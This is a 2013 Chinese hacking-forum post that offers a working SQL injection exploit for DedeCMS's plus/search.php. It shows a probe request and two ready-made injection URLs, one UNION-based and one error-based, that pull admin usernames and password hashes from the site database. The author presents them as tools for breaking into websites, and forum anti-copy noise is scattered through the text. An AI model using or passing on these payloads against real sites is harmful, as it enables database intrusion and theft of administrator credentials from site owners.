找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2037|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ0 @  u1 ~* n" h

& u* ?5 r- A# i+ S$ u0 d哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。& W4 p* S$ ~  G) }" q& r- D3 M

8 J3 h% _5 Y6 u7 u( j; Q' [既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; Z- ?0 R# d" a5 M, l0 P* J' Y* B% H0 ?" j
我一般是这样测试的:1 \! W5 u& p' i: e
$ Y0 V: l# K: K; g
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
% ]. w! o0 r( ^3 p( ~) R/ w
3 V" ]/ ^% U2 l* F" O( l6 L8 O8 N转载不加作者名的没JJ3 P  S; \( N1 j! H9 g
5 N  Y1 g0 J- T  B% G
作者:鬼哥
. s9 C. [1 v! B! V4 X) ]3 ?$ P9 G' |1 D
; K. ^/ Z% O3 o, o( W
4 V. R2 @6 Z8 K  v+ c) F
看结果如果提示* q$ Z1 A# ]; m, |2 f# g

/ l9 y9 `$ I7 a/ cSafe Alert: Request Error step 2 !
. x, ~2 Q# X$ ?2 q. f5 Q) w3 [: H+ v/ b9 @! w
那么直接用下面的exp3 z. _# N* G+ \) `1 d: v

+ s( k2 P( @" m9 `% S* xxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a& h- M; h0 H5 {7 ~2 V5 x" k

* J  ?0 Z0 ^+ z7 s& d9 R7 c% g- y) c" s5 _& e# T0 R+ P' I% Q
看结果如果提示7 ^( A$ Z0 W# T3 U% n. G0 d
6 p4 J! [" E$ |# ]7 n7 z8 M9 h5 v. T
Safe Alert: Request Error step 1 !
, P7 H/ N5 ^( U/ X  [+ i
/ ]2 p# E( M% `) b4 _那么直接用下面的exp; P' L' c1 W! Y" R5 F3 Q5 R8 _
# Y+ O) {/ r: Z0 v, d
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a/ O0 V. |3 K) L6 H- k  b

5 W* \( @2 i, \3 x1 {# I/ h8 U3 f( N
如果正常显示证明漏洞不存在了。
( X( j& F7 ?, T0 D& I
( I/ Y* b. F& t转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表